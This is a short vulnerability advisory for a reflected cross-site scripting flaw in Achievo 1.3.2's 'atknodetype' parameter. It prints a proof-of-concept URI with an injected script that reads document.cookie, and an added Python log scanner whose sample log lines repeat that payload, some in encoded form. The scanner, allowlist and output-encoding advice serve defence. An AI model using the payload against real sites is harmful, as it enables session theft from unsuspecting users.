Achievo 'atknodetype' Parameter Cross Site Scripting Vulnerability

To exploit this issue, an attacker entices an unsuspecting user into following a malicious URI.

The following proof-of-concept URI is available:

http://www.example.com/achievo-1.3.2/dispatch.php?atknodetype=>"><script%20%0a%0d>alert(document.cookie)%3B</script>&atkaction=adminpim&atklevel=-1&atkprevlevel=0&achievo=cgvuu4c9nv45ofdq8ntv1inm82
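
For defenders, requests shaped like the proof-of-concept above can be found in web server access logs by decoding the atknodetype parameter and checking it against an allowlist. The following is an added example, not part of the original advisory or of Achievo's code. It assumes combined-format access logs and that legitimate atknodetype values look like "module.node"; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate atknodetype values look like "module.node".
SAFE_NODETYPE = re.compile(r"[A-Za-z0-9_]+(?:\.[A-Za-z0-9_]+)?")
# Common/combined log format: client IP first, request line in double quotes.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')


def rejected_nodetypes(target):
    """Return decoded atknodetype values in a request target that fail the allowlist."""
    params = parse_qs(urlsplit(target).query)  # percent-decodes each value once
    return [v for v in params.get("atknodetype", []) if not SAFE_NODETYPE.fullmatch(v)]


def scan(lines):
    """Return (client_ip, decoded_value) for every request that fails the allowlist."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable request line
        for value in rejected_nodetypes(m.group("target")):
            hits.append((m.group("ip"), value))
    return hits


# Constructed sample lines: documentation IP ranges, made-up timestamps and values.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:09:00:00 +0000] "GET /achievo-1.3.2/dispatch.php'
    '?atknodetype=pim.pim&atkaction=adminpim&atklevel=-1&atkprevlevel=0 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2010:09:01:00 +0000] "GET /achievo-1.3.2/dispatch.php'
    '?atknodetype=%3E%22%3E%3Cscript%20%0a%0d%3Ealert(document.cookie)%3B%3C/script%3E'
    '&atkaction=adminpim&atklevel=-1&atkprevlevel=0 HTTP/1.1" 200 5342',
    # Double-encoded value: still rejected, because "%" is not in the allowlist.
    '198.51.100.23 - - [01/Jan/2010:09:02:00 +0000] "GET /achievo-1.3.2/dispatch.php'
    '?atknodetype=%253Cscript%253E&atkaction=adminpim HTTP/1.1" 200 5201',
    '192.0.2.10 - - [01/Jan/2010:09:03:00 +0000] "GET /achievo-1.3.2/index.php HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(ip, repr(value))
```

The same allowlist, applied server-side before the value is written into the page, rejects the proof-of-concept value; HTML-encoding the value on output addresses the reflection itself.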


 

Copyright 2010, SecurityFocus